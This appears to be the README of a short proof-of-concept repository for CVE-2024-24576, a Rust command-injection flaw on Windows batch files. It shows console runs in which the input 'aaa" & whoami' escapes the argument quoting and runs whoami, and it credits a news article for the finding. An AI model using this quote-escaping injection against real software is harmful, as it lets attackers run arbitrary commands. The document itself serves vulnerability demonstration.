README.md | Loading last commit info... | |
main.rs | ||
test.bat |
README.md
CVE-2024-24576 PoC
Running the main.rs file with the following payloads give
C:\Users\frost\testing>cargo run
Compiling testing v0.1.0 (C:\Users\frost\testing)
Finished dev [unoptimized + debuginfo] target(s) in 0.49s
Running `target\debug\testing.exe`
enter payload here
aaa
Output:
Argument received: aaa
C:\Users\frost\testing>cargo run
Finished dev [unoptimized + debuginfo] target(s) in 0.01s
Running `target\debug\testing.exe`
enter payload here
aaa & whoami
Output:
Argument received: "aaa & whoami"
C:\Users\frost\testing>cargo run
Finished dev [unoptimized + debuginfo] target(s) in 0.01s
Running `target\debug\testing.exe`
enter payload here
aaa" & whoami
Output:
Argument received: "aaa\"
desktop-8j2vk8b\frost
Note the escaped argument with the " whoami
NOT MY FINDING! Got information from https://www.bleepingcomputer.com/news/security/critical-rust-flaw-enables-windows-command-injection-attacks/